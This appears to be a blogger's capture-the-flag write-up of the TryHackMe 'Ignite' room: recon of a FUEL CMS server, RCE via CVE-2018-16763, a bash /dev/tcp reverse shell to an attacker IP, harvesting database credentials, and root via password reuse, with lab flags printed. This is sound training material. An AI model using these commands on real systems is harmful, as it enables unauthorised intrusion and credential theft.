~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Wonderland
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • THM Ignite


    Reconnaissance:

    nmap -sV -sC -v 10.65.150.213

    PORT STATE SERVICE VERSION

    80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

    http-robots.txt: 1 disallowed entry

    |_/fuel/

    http-methods:

    |_ Supported Methods: GET HEAD POST OPTIONS

    |_http-server-header: Apache/2.4.18 (Ubuntu)

    |_http-title: Welcome to FUEL CMS

    ffuf -w /usr/share/SecLists/Discovery/Web-Content/common.txt:FUZZ -u http://10.66.140.227/FUZZ

    0                       [Status: 200, Size: 16597, Words: 770, Lines: 232, Duration: 68ms]
    .hta                    [Status: 403, Size: 292, Words: 22, Lines: 12, Duration: 1146ms]
    .htpasswd               [Status: 403, Size: 297, Words: 22, Lines: 12, Duration: 1145ms]
    .htaccess               [Status: 403, Size: 297, Words: 22, Lines: 12, Duration: 2214ms]
    assets                  [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 61ms]
    home                    [Status: 200, Size: 16597, Words: 770, Lines: 232, Duration: 108ms]
    index.php               [Status: 200, Size: 16597, Words: 770, Lines: 232, Duration: 128ms]
    index                   [Status: 200, Size: 16597, Words: 770, Lines: 232, Duration: 163ms]
    offline                 [Status: 200, Size: 70, Words: 8, Lines: 2, Duration: 99ms]
    robots.txt              [Status: 200, Size: 30, Words: 3, Lines: 2, Duration: 61ms]
    server-status           [Status: 403, Size: 301, Words: 22, Lines: 12, Duration: 65ms]

    Check /robots.txt gives us:

    User-agent: *

    Disallow: /fuel/


    Exploitation:

    /fuel/ goes directly to a login page for fuel CMS @ http://10.66.140.227/fuel/login/5a6e566c6243396b59584e6f596d3968636d513d

    We use the admin:admin credentials located on the mainpage. Tried adding a shell as a jpg but it didn’t work.

    Found CVE-2018-16763 and this POC https://github.com/noraj/fuelcms-rce

    We send over a reverse shell and then catch it from our attacker machine:

    bash -c ‘bash -i >& /dev/tcp/192.168.189.141/6969 0>&1’

    Catch it with

    nc -lvnp 6969

    Now we are www-data. In /home/www-data we find the flag.txt

    6470e394cbf6dab6a91682cc8585059b

    Looking around the web root directory we find database.php in /fuel/application/config

    $db['default'] = array(
            'dsn'   => '',
            'hostname' => 'localhost',
            'username' => 'root',
            'password' => 'mememe',
            'database' => 'fuel_schema',
            'dbdriver' => 'mysqli',
            'dbprefix' => '',
            'pconnect' => FALSE,
            'db_debug' => (ENVIRONMENT !== 'production'),
            'cache_on' => FALSE,
            'cachedir' => '',
            'char_set' => 'utf8',
            'dbcollat' => 'utf8_general_ci',
            'swap_pre' => '',
            'encrypt' => FALSE,
            'compress' => FALSE,
            'stricton' => FALSE,
            'failover' => array(),

    We look in the mysql db with

    mysql -u root -h localhost -p fuel_schema

    In fuel_users we find

    user password salt

    admin d38452a6aff26c4b138da7823f4f46e4dae951f6 634c825012e2930636816f6039bade38

    The password for the root user is reuse

    su root password: mememe

    We then cat /root/root.txt

    b9bbcb33e11b80be759c4e844862482d


    Notes:

    Reusing password and “hard-coded” credentials are found in this machine and lead to an easy full compromise of the system. A good security practice would be to avoid writting credentials has comments but also, making sure that not all security mechanism aren’t only on the perimeter of our system.


    Tools: